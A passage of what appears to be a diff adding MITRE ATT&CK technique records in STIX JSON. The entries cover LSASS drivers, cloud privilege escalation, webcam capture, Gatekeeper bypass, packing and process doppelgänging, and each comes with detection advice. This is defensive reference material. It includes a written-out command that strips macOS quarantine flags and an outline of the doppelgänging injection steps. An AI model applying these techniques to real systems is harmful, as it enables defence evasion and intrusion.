"x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "created": "2020-10-02T16:50:12.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1593/002", + "external_id": "T1593.002" + }, + { + "source_name": "SecurityTrails Google Hacking", + "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.", + "url": "https://securitytrails.com/blog/google-hacking-techniques" + }, + { + "source_name": "ExploitDB GoogleHacking", + "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.", + "url": "https://www.exploit-db.com/google-hacking-database" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "LSASS Driver", + "description": "The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.\n\nUtilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1177", + "external_id": "T1177" + }, + { + "source_name": "Microsoft Security Subsystem", + "description": "Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.", + "url": "https://technet.microsoft.com/library/cc961760.aspx" + }, + { + "source_name": "Microsoft LSA Protection Mar 2014", + "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.", + "url": "https://technet.microsoft.com/library/dn408187.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Microsoft DLL Security", + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Business Relationships", + "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "created": "2020-10-02T16:27:55.713Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1591/002", + "external_id": "T1591.002" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-28T15:30:09.313Z", + "name": "Temporary Elevated Cloud Access", + "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Azure AD", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "created": "2023-07-10T16:37:15.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/005", + "external_id": "T1548.005" + }, + { + "source_name": "AWS PassRole", + "description": "AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + }, + { + "source_name": "Google Cloud Just in Time Access 2023", + "description": "Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.", + "url": "https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project" + }, + { + "source_name": "Google Cloud Service Account Authentication Roles", + "description": "Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.", + "url": "https://cloud.google.com/iam/docs/service-account-permissions" + }, + { + "source_name": "Microsoft Impersonation and EWS in Exchange", + "description": "Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.", + "url": "https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange" + }, + { + "source_name": "Azure Just in Time Access 2023", + "description": "Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access" + }, + { + "source_name": "Rhino Security Labs AWS Privilege Escalation", + "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.", + "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" + }, + { + "source_name": "Rhino Google Cloud Privilege Escalation", + "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023.", + "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" + }, + { + "source_name": "Hunters Domain Wide Delegation Google Workspace 2023", + "description": "Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.", + "url": "https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover" + }, + { + "source_name": "Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023", + "description": "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.", + "url": "https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Video Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "created": "2017-05-31T21:31:37.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1125", + "external_id": "T1125" + }, + { + "source_name": "objective-see 2017 review", + "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Gatekeeper Bypass", + "description": "In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \n\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\n \nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1144", + "external_id": "T1144" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Clearing quarantine attribute", + "description": "Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.", + "url": "https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/" + }, + { + "source_name": "OceanLotus for OS X", + "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", + "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" + }, + { + "source_name": "Bypassing Gatekeeper", + "description": "Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Software Packing", + "description": "Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.\n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.\n\nAdversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Filip Kafka, ESET" + ], + "x_mitre_detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Signature-based detection", + "Anti-virus", + "Heuristic detection" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", + "created": "2017-05-31T21:30:43.472Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1045", + "external_id": "T1045" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html", + "external_id": "CAPEC-570" + }, + { + "source_name": "Wikipedia Exe Compression", + "description": "Executable compression. (n.d.). Retrieved December 4, 2014.", + "url": "http://en.wikipedia.org/wiki/Executable_compression" + }, + { + "source_name": "ESET FinFisher Jan 2018", + "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Process Doppelgänging", + "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "created": "2020-01-14T17:19:50.978Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/013", + "external_id": "T1055.013" + }, + { + "source_name": "Microsoft TxF", + "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" + }, + { + "source_name": "Microsoft Basic TxF Concepts", + "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" + }, + { + "source_name": "Microsoft Where to use TxF", + "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" + }, + { + "source_name": "BlackHat Process Doppelgänging Dec 2017", + "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.", + "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" + }, + { + "source_name": "hasherezade Process Doppelgänging Dec 2017", + "description": "hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.", + "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" + }, + { + "source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", + "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T14:40:54.580Z", + "name": "System Network Configuration Discovery", + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "created": "2017-05-31T21:30:27.342Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1016", + "external_id": "T1016" + }, + { + "source_name": "Mandiant APT41 Global Intrusion ", + "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.", + "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Delete Cloud Instance", + "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to 